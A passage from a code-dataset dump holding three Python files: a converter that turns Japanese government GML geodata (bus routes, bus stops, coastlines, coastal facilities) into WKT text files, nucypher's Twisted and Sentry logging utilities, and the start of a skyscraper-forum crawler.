\"{http://fgd.gsi.go.jp/spec/2008/FGD_GMLSchema}\"\nns_gml = \"{http://www.opengis.net/gml/3.2}\"\nns_jmp = \"{http://zgate.gsi.go.jp/ch/jmp}\"\nns_ksj = \"{http://nlftp.mlit.go.jp/ksj/schemas/ksj-app}\"\nns_xln = \"{http://www.w3.org/1999/xlink}\"\nns_xsi = \"{http://www.w3.org/2001/XMLSchema-instance}\"\n\ndef checkEncoding(filename):\n p = XMLParser(huge_tree=True)\n \n with open(filename, 'r') as xmlfile:\n tree = etree.parse(xmlfile,parser=p)\n return(tree.docinfo.encoding.lower())\n\ndef openAndWriteDoc(filename, header, data):\n if os.path.exists(filename) != True:\n output = open(filename, \"w\")\n output.write(header)\n else:\n output = open(filename, \"a\")\n output.write(data)\n output.close()\n\ndef getGmlPoint(geom):\n point = geom.find(\".//\" + ns_gml + \"pos\").text.split(\" \")\n return \"POINT(\" + point[1] + \" \" + point[0] + \")\"\n\ndef getGmlPolyline(geom):\n parts = \"\"\n part = \"\"\n \n for seg in geom:\n posl = seg.find(\".//\" + ns_gml + \"posList\").text.strip().split(\"\\n\")\n ctrl = \"\"\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n return \"LINESTRING(\" + ctrl.strip(\",\") + \")\"\n\ndef getGmlPolygon(geom):\n parts = \"\"\n inte = \"\"\n exte = \"\"\n \n pchs = geom.find(\".//\" + ns_gml + \"PolygonPatch\")\n \n for rngs in pchs:\n ctrl = \"\"\n if rngs.tag == ns_gml + \"exterior\":\n segs = rngs.find(\".//\" + ns_gml + \"segments\")\n for seg in segs:\n posl = seg.find(\".//\" + ns_gml + \"posList\").text.strip().split(\"\\n\")\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n exte = \"(\" + ctrl.strip(\",\") + \")\"\n if rngs.tag == ns_gml + \"interior\":\n segs = rngs.find(\".//\" + ns_gml + \"segments\")\n for seg in segs:\n posl = seg.find(\".//\" + ns_gml + \"posList\").text.strip().split(\"\\n\")\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n inte = \"(\" + ctrl.strip(\",\") + \")\"\n parts = exte + \",\" + inte\n return \"POLYGON(\" + parts.strip(\",\") + \")\"\n\ndef convertJmp(xmlfile, outdir):\n print(\"Now Processing: \" + xmlfile)\n \n # Read the XML file.\n data = open(xmlfile).read()\n \n # Parsing the XML string.\n root = et.fromstring(data)\n feat_cnt = 0\n \n if root.tag == ns_ksj + \"Dataset\":\n if root.attrib[ns_gml+\"id\"] == \"N07Dataset\":\n parseBusRoute(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"P11Dataset\":\n parseBusStop(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"C23Dataset\":\n parseCoastLine(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"P23Dataset\":\n parseCoastFacilities(root, outdir)\n\ndef parseBusStop(root, outdir):\n strln_busStop = \"\"\n strln_routeInfo = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n busStops = root.findall(\".//\" + ns_ksj + \"BusStop\")\n \n for busStop in busStops:\n uuid = str(busStop.attrib[ns_gml + \"id\"].encode(\"utf-8\"))\n refid = busStop.find(ns_ksj + \"position\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n busStopName = str(busStop.find(ns_ksj + \"busStopName\").text.encode(\"utf-8\"))\n \n point = root.find(\".//\" + ns_gml + \"Point[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPoint(point)\n \n strln_busStop = strln_busStop + uuid + \":\" + busStopName + \":\" + wkt_geom + \"\\n\"\n \n routeInfo = busStop.findall(ns_ksj + \"busRouteInformation\")\n for route in routeInfo:\n busType = \"\"\n busTypeCode = route.find(\".//\" + ns_ksj + \"busType\").text\n if busTypeCode == \"1\":\n busType = \"民間バス\"\n elif busTypeCode == \"2\":\n busType = \"公営バス\"\n elif busTypeCode == \"3\":\n busType = \"コミュニティバス\"\n elif busTypeCode == \"4\":\n busType = \"デマンドバス\"\n elif busTypeCode == \"5\":\n busType = \"その他\"\n else:\n busType == \"不明\"\n \n busOperationCompany = str(route.find(\".//\" + ns_ksj + \"busOperationCompany\").text.encode(\"utf-8\"))\n busLineName = str(route.find(\".//\" + ns_ksj + \"busLineName\").text.encode(\"utf-8\"))\n \n strln_routeInfo = strln_routeInfo + uuid + \":\" + busType + \":\" + busOperationCompany + \":\" + busLineName + \"\\n\"\n \n outfile_stop = os.path.join(outdir, 'busStop.txt')\n header_stop = \"id:busStopName:node\\n\"\n openAndWriteDoc(outfile_stop, header_stop, strln_busStop)\n \n outfile_route = os.path.join(outdir, 'busStopRouteInfo.txt')\n header_route = \"id:busType:busOperationCompany:busLineName\\n\"\n openAndWriteDoc(outfile_route, header_route, strln_routeInfo)\n \ndef parseBusRoute(root, outdir):\n strln_busRoute = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n busRoutes = root.findall(\".//\" + ns_ksj + \"BusRoute\")\n \n for busRoute in busRoutes:\n uuid = busRoute.attrib[ns_gml + \"id\"]\n refid = busRoute.find(ns_ksj + \"brt\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n busType = None\n busTypeCode = busRoute.find(ns_ksj + \"bsc\").text\n if busTypeCode == \"1\":\n busType = \"民間バス\"\n elif busTypeCode == \"2\":\n busType = \"公営バス\"\n elif busTypeCode == \"3\":\n busType = \"コミュニティバス\"\n elif busTypeCode == \"4\":\n busType = \"デマンドバス\"\n elif busTypeCode == \"5\":\n busType = \"その他\"\n else:\n busType == \"不明\"\n \n company = str(busRoute.find(ns_ksj + \"boc\").text.encode(\"utf-8\"))\n lineName = str(busRoute.find(ns_ksj + \"bln\").text.encode(\"utf-8\"))\n linesPerDay = str(busRoute.find(ns_ksj + \"rpd\").text.encode(\"utf-8\"))\n linesPerSat = str(busRoute.find(ns_ksj + \"rps\").text.encode(\"utf-8\"))\n linesPerSun = str(busRoute.find(ns_ksj + \"rph\").text.encode(\"utf-8\"))\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPolyline(edge)\n \n strln_busRoute = strln_busRoute + uuid + \":\" + busType + \":\" + company + \":\" + lineName + \":\" + linesPerDay + \":\" + linesPerSat + \":\" + linesPerSun + \":\" + wkt_geom + \"\\n\"\n \n outfile = os.path.join(outdir, 'busRoute.txt')\n header = \"id:busType:busOperationCompany:busLineName:linesPerWorkday:linesPerSat:linesPerSun:edge\\n\"\n openAndWriteDoc(outfile, header, strln_busRoute)\n\ndef parseCoastLine(root, outdir):\n strln_coastLine = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n coastLines = root.findall(\".//\" + ns_ksj + \"Coastline\")\n \n for coastLine in coastLines:\n uuid = coastLine.attrib[ns_gml + \"id\"]\n refid = coastLine.find(ns_ksj + \"location\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\"\n compAuthCode = \"\"\n compAuth = \"\"\n areaNumber = \"\"\n areaName = \"\"\n coastAdminCode = \"\"\n coastAdmin = \"\"\n coastAdminName = \"\"\n branchingBay = \"\"\n \n if not coastLine.find(ns_ksj + \"administrativeAreaCode\") == None:\n adminCode = str(coastLine.find(ns_ksj + \"administrativeAreaCode\").text.encode(\"utf-8\")) # 行政区域コード\n \n if not coastLine.find(ns_ksj + \"competentAuthorities\") == None:\n compAuthCode = str(coastLine.find(ns_ksj + \"competentAuthorities\").text.encode(\"utf-8\")) # 所管官庁コード\n \n # Decode the competent authorities code.\n if compAuthCode == \"1\":\n compAuth = \"国土交通省河川局\"\n elif compAuthCode == \"2\":\n compAuth = \"国土交通省港湾局\"\n elif compAuthCode == \"3\":\n compAuth = \"農林水産省農村振興局\"\n elif compAuthCode == \"4\":\n compAuth = \"農林水産省水産庁\"\n elif compAuthCode == \"5\":\n compAuth = \"農振河川共管\"\n elif compAuthCode == \"6\":\n compAuth = \"不明(原典資料を入手できなかった場合)\"\n elif compAuthCode == \"7\":\n compAuth = \"不明(原典資料をデータ化できなかった場合)\"\n elif compAuthCode == \"0\":\n compAuth = \"その他\"\n else:\n compAuth = \"unknown\"\n \n if not coastLine.find(ns_ksj + \"areaNumber\") == None:\n areaNumber = str(coastLine.find(ns_ksj + \"areaNumber\").text.encode(\"utf-8\")) # 海岸保全区域番号\n if not coastLine.find(ns_ksj + \"areaName\") == None:\n areaName = str(coastLine.find(ns_ksj + \"areaName\").text.encode(\"utf-8\")) # 海岸保全区域・海岸名\n if not coastLine.find(ns_ksj + \"administrator\") == None:\n coastAdminCode = str(coastLine.find(ns_ksj + \"administrator\").text.encode(\"utf-8\")) # 海岸保全区域・海岸管理者\n \n # Decode the coast line administrator code.\n if coastAdminCode == \"1\":\n coastAdmin = \"都道府県知事\"\n elif coastAdminCode == \"2\":\n coastAdmin = \"市町村長\"\n elif coastAdminCode == \"3\":\n coastAdmin = \"一般事務組合\"\n elif coastAdminCode == \"4\":\n coastAdmin = \"港務局\"\n elif coastAdminCode == \"9\":\n coastAdmin = \"不明\"\n elif coastAdminCode == \"0\":\n coastAdmin = \"その他\"\n else:\n compAuth = \"unknown\"\n if not coastLine.find(ns_ksj + \"administratorname\") == None:\n coastAdminName = str(coastLine.find(ns_ksj + \"administratorname\").text.encode(\"utf-8\")) # 海岸保全区域・海岸管理者名\n if not coastLine.find(ns_ksj + \"branchingBay\") == None:\n branchingBay = str(coastLine.find(ns_ksj + \"branchingBay\").text.encode(\"utf-8\")) # 河口\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\") # 場所\n wkt_geom = getGmlPolyline(edge)\n \n strln_coastLine = strln_coastLine + uuid + \":\" + adminCode + \":\" + compAuth + \":\" + areaNumber + \":\" + areaName + \":\" + coastAdmin + \":\" + coastAdminName + \":\" + branchingBay + \":\" + wkt_geom + \"\\n\"\n \n outfile = os.path.join(outdir, 'coastLine.txt')\n header = \"id:administrativeAreaCode:competentAuthorities:areaNumber:areaName:administrator:administratorname:branchingBay:edge\\n\"\n openAndWriteDoc(outfile, header, strln_coastLine)\n\ndef parseCoastFacilities(root, outdir):\n strln_Facilities = \"\"\n strln_Facilities_pt = \"\"\n strln_Facilities_cv = \"\"\n \n description = root.find(\".//\" + ns_gml + \"description\").text\n facilities_pts = root.findall(\".//\" + ns_ksj + \"CoastalFacilities_Point\")\n facilities_lns = root.findall(\".//\" + ns_ksj + \"CoastalFacilities_Line\")\n \n for facilities_pt in facilities_pts:\n uuid = facilities_pt.attrib[ns_gml + \"id\"]\n uuid2 = uuid.replace(\"_P_\",\"_\")\n refid = facilities_pt.find(ns_ksj + \"position\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\" # 行政コード\n compAuth = \"\" # 所管省庁\n facilAdmin = \"\" # 管理者\n baseLevel = \"\" # 基準面\n MaxPresent = \"\" # 天端高最大(現況)\n MinPresent = \"\" # 天端高最小(現況)\n MaxPlan = \"\" # 天端高最大(計画)\n MinPlan = \"\" # 天端高最小(計画)\n \n elem_adminCode = facilities_pt.find(ns_ksj + \"administrativeAreaCode\")\n elem_compAuth = facilities_pt.find(ns_ksj + \"competentAuthority\")\n elem_facilAdmin = facilities_pt.find(ns_ksj + \"administrator\")\n elem_baseLevel = facilities_pt.find(ns_ksj + \"baseLevel\")\n elem_MaxPresent = facilities_pt.find(ns_ksj + \"copeLevelMaxPresent\")\n elem_MinPresent = facilities_pt.find(ns_ksj + \"copeLevelMinPresent\")\n elem_MaxPlan = facilities_pt.find(ns_ksj + \"copeLevelMaxPlan\")\n elem_MinPlan = facilities_pt.find(ns_ksj + \"copeLevelMinPlan\")\n \n if not elem_adminCode == None:\n if not elem_adminCode.text == None:\n adminCode = elem_adminCode.text.encode(\"utf-8\") # 行政区域コード\n if not elem_compAuth == None:\n if not elem_compAuth.text == None:\n compAuth = elem_compAuth.text.encode(\"utf-8\") # 所管官庁\n if not elem_facilAdmin == None:\n if not elem_facilAdmin.text == None:\n facilAdmin = elem_facilAdmin.text.encode(\"utf-8\") # 管理者\n if not elem_baseLevel == None:\n if not elem_baseLevel.text == None:\n baseLevel = elem_baseLevel.text.encode(\"utf-8\") # 基準面\n if not elem_MaxPresent == None:\n if not elem_MaxPresent.text == None:\n MaxPresent = elem_MaxPresent.text.encode(\"utf-8\") # 天端高最大(現況)\n if not elem_MinPresent == None:\n if not elem_MinPresent.text == None:\n MinPresent = elem_MinPresent.text.encode(\"utf-8\") # 天端高最小(現況)\n if not elem_MaxPlan == None:\n if not elem_MaxPlan.text == None:\n MaxPlan = elem_MaxPlan.text.encode(\"utf-8\") # 天端高最大(計画)\n if not elem_MinPlan == None:\n if not elem_MinPlan.text == None:\n MinPlan = elem_MinPlan.text.encode(\"utf-8\") # 天端高最小(計画)\n \n facilityType_bank = \"\"\n facilityType_groin = \"\"\n facilityType_bankProtection = \"\"\n facilityType_breastWall = \"\"\n facilityType_offshoreBreakwater = \"\"\n facilityType_sandyBeach = \"\"\n facilityType_otherFacilities = \"\"\n \n facilityTypes = facilities_pt.find(ns_ksj + \"facilityType\")\n \n for facilityType in facilityTypes:\n elem_facilityType_bank = facilityType.find(\".//\" + ns_ksj + \"bank\")\n elem_facilityType_groin = facilityType.find(\".//\" + ns_ksj + \"groin\")\n elem_facilityType_bankProtection = facilityType.find(\".//\" + ns_ksj + \"bankProtection\")\n elem_facilityType_breastWall = facilityType.find(\".//\" + ns_ksj + \"breastWall\")\n elem_facilityType_offshoreBreakwater = facilityType.find(\".//\" + ns_ksj + \"offshoreBreakwater\")\n elem_facilityType_sandyBeach = facilityType.find(\".//\" + ns_ksj + \"sandyBeach\")\n elem_facilityType_otherFacilities = facilityType.find(\".//\" + ns_ksj + \"otherFacilities\")\n \n if not elem_facilityType_bank.text == None:\n facilityType_bank = elem_facilityType_bank.text.encode(\"utf-8\") # 堤防\n if not elem_facilityType_groin.text == None:\n facilityType_groin = elem_facilityType_groin.text.encode(\"utf-8\") # 突堤\n if not elem_facilityType_bankProtection.text == None:\n facilityType_bankProtection = elem_facilityType_bankProtection.text.encode(\"utf-8\") # 護岸\n if not elem_facilityType_breastWall.text == None:\n facilityType_breastWall = elem_facilityType_breastWall.text.encode(\"utf-8\") # 胸壁\n if not elem_facilityType_offshoreBreakwater.text == None:\n facilityType_offshoreBreakwater = elem_facilityType_offshoreBreakwater.text.encode(\"utf-8\")# 離岸堤\n if not elem_facilityType_sandyBeach.text == None:\n facilityType_sandyBeach = elem_facilityType_sandyBeach.text.encode(\"utf-8\") # 砂浜\n if not elem_facilityType_otherFacilities.text == None:\n facilityType_otherFacilities = elem_facilityType_otherFacilities.text.encode(\"utf-8\") # その他の施設 \n \n strln_Facilities = strln_Facilities + uuid2 + \":\" + adminCode + \":\" + compAuth + \":\" + facilAdmin + \":\" + \\\n baseLevel + \":\" + MaxPresent + \":\" + MaxPlan + \":\" + MinPlan + \":\" + \\\n facilityType_bank + \":\" + facilityType_groin + \":\" + facilityType_bankProtection + \":\" + \\\n facilityType_breastWall + \":\" + facilityType_offshoreBreakwater + \":\" + facilityType_sandyBeach + \":\" + \\\n facilityType_otherFacilities + \"\\n\"\n \n point = root.find(\".//\" + ns_gml + \"Point[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPoint(point)\n \n strln_Facilities_pt = strln_Facilities_pt + uuid + \":\" + uuid2 + \":\" + wkt_geom + \"\\n\"\n \n outfile_attrib = os.path.join(outdir, 'coastFacilities.txt')\n header_attrib = \"id:AdministratorCode:competentAuthority:Administrator:baseLevel:copeLevelMaxPresent:copeLevelMinPresent:copeLevelMaxPlan:copeLevelMinPlan\\n\"\n openAndWriteDoc(outfile_attrib, header_attrib, strln_Facilities)\n \n outfile_point = os.path.join(outdir, 'coastFacilities_point.txt')\n header_point = \"id:id2:point\\n\"\n openAndWriteDoc(outfile_point, header_point, strln_Facilities_pt)\n \n for facilities_ln in facilities_lns:\n uuid = facilities_ln.attrib[ns_gml + \"id\"]\n uuid2 = uuid.replace(\"_P_\",\"_\")\n refid = facilities_ln.find(ns_ksj + \"location\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\" # 行政コード\n compAuth = \"\" # 所管省庁\n facilAdmin = \"\" # 管理者\n baseLevel = \"\" # 基準面\n MaxPresent = \"\" # 天端高最大(現況)\n MinPresent = \"\" # 天端高最小(現況)\n MaxPlan = \"\" # 天端高最大(計画)\n MinPlan = \"\" # 天端高最小(計画)\n \n elem_adminCode = facilities_ln.find(ns_ksj + \"administrativeAreaCode\")\n elem_compAuth = facilities_ln.find(ns_ksj + \"competentAuthority\")\n elem_facilAdmin = facilities_ln.find(ns_ksj + \"administrator\")\n elem_baseLevel = facilities_ln.find(ns_ksj + \"baseLevel\")\n elem_MaxPresent = facilities_ln.find(ns_ksj + \"copeLevelMaxPresent\")\n elem_MinPresent = facilities_ln.find(ns_ksj + \"copeLevelMinPresent\")\n elem_MaxPlan = facilities_ln.find(ns_ksj + \"copeLevelMaxPlan\")\n elem_MinPlan = facilities_ln.find(ns_ksj + \"copeLevelMinPlan\")\n \n if not elem_adminCode == None:\n if not elem_adminCode.text == None:\n adminCode = elem_adminCode.text.encode(\"utf-8\") # 行政区域コード\n if not elem_compAuth == None:\n if not elem_compAuth.text == None:\n compAuth = elem_compAuth.text.encode(\"utf-8\") # 所管官庁\n if not elem_facilAdmin == None:\n if not elem_facilAdmin.text == None:\n facilAdmin = elem_facilAdmin.text.encode(\"utf-8\") # 管理者\n if not elem_baseLevel == None:\n if not elem_baseLevel.text == None:\n baseLevel = elem_baseLevel.text.encode(\"utf-8\") # 基準面\n if not elem_MaxPresent == None:\n if not elem_MaxPresent.text == None:\n MaxPresent = elem_MaxPresent.text.encode(\"utf-8\") # 天端高最大(現況)\n if not elem_MinPresent == None:\n if not elem_MinPresent.text == None:\n MinPresent = elem_MinPresent.text.encode(\"utf-8\") # 天端高最小(現況)\n if not elem_MaxPlan == None:\n if not elem_MaxPlan.text == None:\n MaxPlan = elem_MaxPlan.text.encode(\"utf-8\") # 天端高最大(計画)\n if not elem_MinPlan == None:\n if not elem_MinPlan.text == None:\n MinPlan = elem_MinPlan.text.encode(\"utf-8\") # 天端高最小(計画)\n \n facilityType_bank = \"\"\n facilityType_groin = \"\"\n facilityType_bankProtection = \"\"\n facilityType_breastWall = \"\"\n facilityType_offshoreBreakwater = \"\"\n facilityType_sandyBeach = \"\"\n facilityType_otherFacilities = \"\"\n \n facilityTypes = facilities_ln.find(ns_ksj + \"facilityType\")\n \n for facilityType in facilityTypes:\n elem_facilityType_bank = facilityType.find(\".//\" + ns_ksj + \"bank\")\n elem_facilityType_groin = facilityType.find(\".//\" + ns_ksj + \"groin\")\n elem_facilityType_bankProtection = facilityType.find(\".//\" + ns_ksj + \"bankProtection\")\n elem_facilityType_breastWall = facilityType.find(\".//\" + ns_ksj + \"breastWall\")\n elem_facilityType_offshoreBreakwater = facilityType.find(\".//\" + ns_ksj + \"offshoreBreakwater\")\n elem_facilityType_sandyBeach = facilityType.find(\".//\" + ns_ksj + \"sandyBeach\")\n elem_facilityType_otherFacilities = facilityType.find(\".//\" + ns_ksj + \"otherFacilities\")\n \n if not elem_facilityType_bank.text == None:\n facilityType_bank = elem_facilityType_bank.text.encode(\"utf-8\") # 堤防\n if not elem_facilityType_groin.text == None:\n facilityType_groin = elem_facilityType_groin.text.encode(\"utf-8\") # 突堤\n if not elem_facilityType_bankProtection.text == None:\n facilityType_bankProtection = elem_facilityType_bankProtection.text.encode(\"utf-8\") # 護岸\n if not elem_facilityType_breastWall.text == None:\n facilityType_breastWall = elem_facilityType_breastWall.text.encode(\"utf-8\") # 胸壁\n if not elem_facilityType_offshoreBreakwater.text == None:\n facilityType_offshoreBreakwater = elem_facilityType_offshoreBreakwater.text.encode(\"utf-8\")# 離岸堤\n if not elem_facilityType_sandyBeach.text == None:\n facilityType_sandyBeach = elem_facilityType_sandyBeach.text.encode(\"utf-8\") # 砂浜\n if not elem_facilityType_otherFacilities.text == None:\n facilityType_otherFacilities = elem_facilityType_otherFacilities.text.encode(\"utf-8\") # その他の施設\n \n strln_Facilities = strln_Facilities + uuid + \":\" + uuid2 + \":\" + adminCode + \":\" + compAuth + \":\" + facilAdmin + \":\" + \\\n baseLevel + \":\" + MaxPresent + \":\" + MaxPlan + \":\" + MinPlan + \":\" + \\\n facilityType_bank + \":\" + facilityType_groin + \":\" + facilityType_bankProtection + \":\" + \\\n facilityType_breastWall + \":\" + facilityType_offshoreBreakwater + \":\" + facilityType_sandyBeach + \":\" + \\\n facilityType_otherFacilities + \"\\n\"\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\") # 場所\n wkt_geom = getGmlPolyline(edge)\n \n strln_Facilities_cv = strln_Facilities_cv + uuid + \":\" + uuid2 + \":\" + wkt_geom + \"\\n\"\n \n openAndWriteDoc(outfile_attrib, header_attrib, strln_Facilities)\n uniqlines = set(open(outfile_attrib).readlines())\n new_outfile_attrib = open(outfile_attrib, 'w').writelines(set(uniqlines))\n new_outfile_attrib.close()\n \n outfile_line = os.path.join(outdir, 'coastFacilities_line.txt')\n header_line = \"id:id2:point\\n\"\n openAndWriteDoc(outfile_line, header_line, strln_Facilities_cv)\n \n#convertJmp('/home/yufujimoto/Desktop/N07-11_29_GML/N07-11_29.xml','/home/yufujimoto/Desktop' )\n#convertJmp('/home/yufujimoto/Desktop/P11-10_29_GML/P11-10_29-jgd-g.xml','/home/yufujimoto/Desktop' )\n#convertJmp('/home/yufujimoto/Desktop/C23-06_47_GML/C23-06_47-g.xml','/home/yufujimoto/Desktop' )\nconvertJmp('/home/yufujimoto/Desktop/P23-12_01_GML/P23-12_01.xml','/home/yufujimoto/Desktop')","repo_name":"yufujimoto/kibanchizu-converter","sub_path":"jmp.py","file_name":"jmp.py","file_ext":"py","file_size_in_byte":24433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"69989795911","text":"\n\n\nimport pathlib\nfrom contextlib import contextmanager\n\nfrom twisted.logger import (\n FileLogObserver,\n LogLevel,\n formatEvent,\n formatEventAsClassicLogText,\n globalLogPublisher,\n jsonFileLogObserver,\n)\nfrom twisted.logger import Logger as TwistedLogger\nfrom twisted.python.logfile import LogFile\n\nimport nucypher\nfrom nucypher.config.constants import (\n DEFAULT_JSON_LOG_FILENAME,\n DEFAULT_LOG_FILENAME,\n NUCYPHER_SENTRY_ENDPOINT,\n USER_LOG_DIR,\n)\n\nONE_MEGABYTE = 1_048_576\nMAXIMUM_LOG_SIZE = ONE_MEGABYTE * 10\nMAX_LOG_FILES = 10\n\n\ndef initialize_sentry(dsn: str):\n try:\n import sentry_sdk\n from sentry_sdk.integrations.logging import LoggingIntegration\n except ImportError:\n raise ImportError('Sentry SDK is not installed. Please install it and try again.')\n\n import logging\n\n # Logger ignore list\n ignored_loggers = ()\n\n def before_breadcrumb(crumb, hint):\n logger = crumb.get('category')\n if logger in ignored_loggers:\n return\n return crumb\n\n def before_send(event, hint):\n logger = event.get('logger')\n if logger in ignored_loggers:\n return\n return event\n\n sentry_logging = LoggingIntegration(\n level=logging.DEBUG, # Capture debug and above as breadcrumbs\n event_level=logging.ERROR # Send errors as events\n )\n sentry_sdk.init(\n dsn=dsn,\n release=nucypher.__version__,\n integrations=[sentry_logging],\n before_breadcrumb=before_breadcrumb,\n before_send=before_send\n )\n\n\nclass GlobalLoggerSettings:\n\n log_level = LogLevel.levelWithName(\"info\")\n _json_ipc = False # TODO: Oh no... #1754\n\n @classmethod\n def set_log_level(cls, log_level_name):\n cls.log_level = LogLevel.levelWithName(log_level_name)\n\n @classmethod\n def start_console_logging(cls):\n globalLogPublisher.addObserver(console_observer)\n\n @classmethod\n def stop_console_logging(cls):\n globalLogPublisher.removeObserver(console_observer)\n\n @classmethod\n @contextmanager\n def pause_all_logging_while(cls):\n former_observers = tuple(globalLogPublisher._observers)\n for observer in former_observers:\n globalLogPublisher.removeObserver(observer)\n yield\n for observer in former_observers:\n globalLogPublisher.addObserver(observer)\n\n @classmethod\n def start_text_file_logging(cls):\n globalLogPublisher.addObserver(get_text_file_observer())\n\n @classmethod\n def stop_text_file_logging(cls):\n globalLogPublisher.removeObserver(get_text_file_observer())\n\n @classmethod\n def start_json_file_logging(cls):\n globalLogPublisher.addObserver(get_json_file_observer())\n\n @classmethod\n def stop_json_file_logging(cls):\n globalLogPublisher.removeObserver(get_json_file_observer())\n\n @classmethod\n def start_sentry_logging(cls, dsn: str):\n _SentryInitGuard.init(dsn)\n globalLogPublisher.addObserver(sentry_observer)\n\n @classmethod\n def stop_sentry_logging(cls):\n globalLogPublisher.removeObserver(sentry_observer)\n\n\ndef console_observer(event):\n if event['log_level'] >= GlobalLoggerSettings.log_level:\n print(formatEvent(event))\n\n\nclass _SentryInitGuard:\n initialized = False\n dsn = None\n\n @classmethod\n def init(cls, dsn: str = NUCYPHER_SENTRY_ENDPOINT):\n if not cls.initialized:\n initialize_sentry(dsn)\n else:\n raise ValueError(f\"Sentry has been already initialized with DSN {cls.dsn}\")\n\n\ndef sentry_observer(event):\n try:\n from sentry_sdk import add_breadcrumb, capture_exception\n except ImportError:\n raise ImportError('Sentry SDK is not installed. Please install it and try again.')\n\n # Handle breadcrumbs...\n if not event.get('isError') or 'failure' not in event:\n add_breadcrumb(level=event.get('log_level').name,\n message=event.get('log_format'),\n category=event.get('log_namespace'))\n return\n\n # ...Handle Failures\n f = event['failure']\n capture_exception((f.type, f.value, f.getTracebackObject()))\n\n\ndef _ensure_dir_exists(path):\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef get_json_file_observer(name=DEFAULT_JSON_LOG_FILENAME, path=USER_LOG_DIR):\n _ensure_dir_exists(path)\n logfile = LogFile(name=name, directory=path, rotateLength=MAXIMUM_LOG_SIZE, maxRotatedFiles=MAX_LOG_FILES)\n observer = jsonFileLogObserver(outFile=logfile)\n return observer\n\n\ndef get_text_file_observer(name=DEFAULT_LOG_FILENAME, path=USER_LOG_DIR):\n _ensure_dir_exists(path)\n logfile = LogFile(name=name, directory=path, rotateLength=MAXIMUM_LOG_SIZE, maxRotatedFiles=MAX_LOG_FILES)\n observer = FileLogObserver(formatEvent=formatEventAsClassicLogText, outFile=logfile)\n return observer\n\n\nclass Logger(TwistedLogger):\n \"\"\"Drop-in replacement of Twisted's Logger, patching the emit() method to tolerate inputs with curly braces,\n i.e., not compliant with PEP 3101.\n\n See Issue #724 and, particularly, https://github.com/nucypher/nucypher/issues/724#issuecomment-600190455\"\"\"\n\n @classmethod\n def escape_format_string(cls, string):\n \"\"\"\n Escapes all curly braces from a PEP-3101's format string.\n \"\"\"\n escaped_string = string.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n return escaped_string\n\n def emit(self, level, format=None, **kwargs):\n clean_format = self.escape_format_string(str(format))\n super().emit(level=level, format=clean_format, **kwargs)\n","repo_name":"nucypher/nucypher","sub_path":"nucypher/utilities/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"27"} +{"seq_id":"11173932352","text":"#!/usr/bin/env python\n\nimport re\nimport argparse\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urljoin\nfrom urllib.error import URLError\n\nfrom bs4 import BeautifulSoup\nfrom progress.spinner import Spinner\n\nfrom skycrawler import database\nfrom skycrawler import utils\n\n\nclass Crawler:\n\n def __init__(self, init_db=False):\n\n if init_db:\n database.drop_db()\n database.init_db()\n\n # Init url index with previously fetch buildings\n self._buildings = utils.get_building_index()\n self._cities = utils.get_city_index()\n self._new_buildings = 0\n\n # Index an individual page\n def add_to_index(self, url, values):\n city = values[0]\n city_key = values[0].lower().replace(' ', '')\n name = values[1]\n height = None\n floors = None\n latitude = None\n longitude = None\n status = values[-1]\n for value in values:\n if height is None:\n reg_height_m = re.match(r'~?\\+?(?P\\d{3,})m', value)\n reg_height_ft = re.match(r'~?\\+?(?P\\d{3,})ft', value)\n if reg_height_m:\n height = reg_height_m.group('height')\n elif reg_height_ft:\n height = reg_height_ft.group('height')\n height = int(int(height) * 0.3048)\n\n if floors is None:\n reg_floors = re.match(r'(?P\\d{2,})~?\\+? fl', value)\n if reg_floors:\n floors = reg_floors.group('floors')\n\n if self._cities.get(city_key):\n city_id = self._cities[city_key]\n else:\n city_id = utils.insert_city(city, latitude, longitude)\n self._cities[city_key] = city_id\n utils.insert_building(name, height, floors, url, city_id, status)\n self._buildings.append(utils.sanitize_building(city, name))\n self._new_buildings += 1\n\n @staticmethod\n def update_city_coordonates():\n utils.update_city_coordinates()\n\n # Extract the text from an HTML page (no tags)\n def get_text_only(self, soup):\n v = soup.string\n if v is None:\n c = soup.contents\n result_text = ''\n for t in c:\n subtext = self.get_text_only(t)\n result_text += subtext+'\\n'\n return result_text\n else:\n return v.strip()\n\n # Separate the words by any non-whitespace character\n @staticmethod\n def split_words(text):\n return [x.strip() for x in text.split('|')]\n\n # Return true if this url is already indexed\n def is_indexed(self, values):\n return utils.sanitize_building(values[0], values[1]) in self._buildings\n\n @staticmethod\n def is_thread(url):\n return '/threads/' in url\n\n @staticmethod\n def is_first_page(url):\n return '&page=' not in url\n\n @staticmethod\n def is_useful(url):\n return url.startswith('https://www.skyscrapercity') and Crawler.is_first_page(url) and Crawler.is_thread(url)\n\n @staticmethod\n def is_menu(url):\n return url.startswith('https://www.skyscrapercity') and not 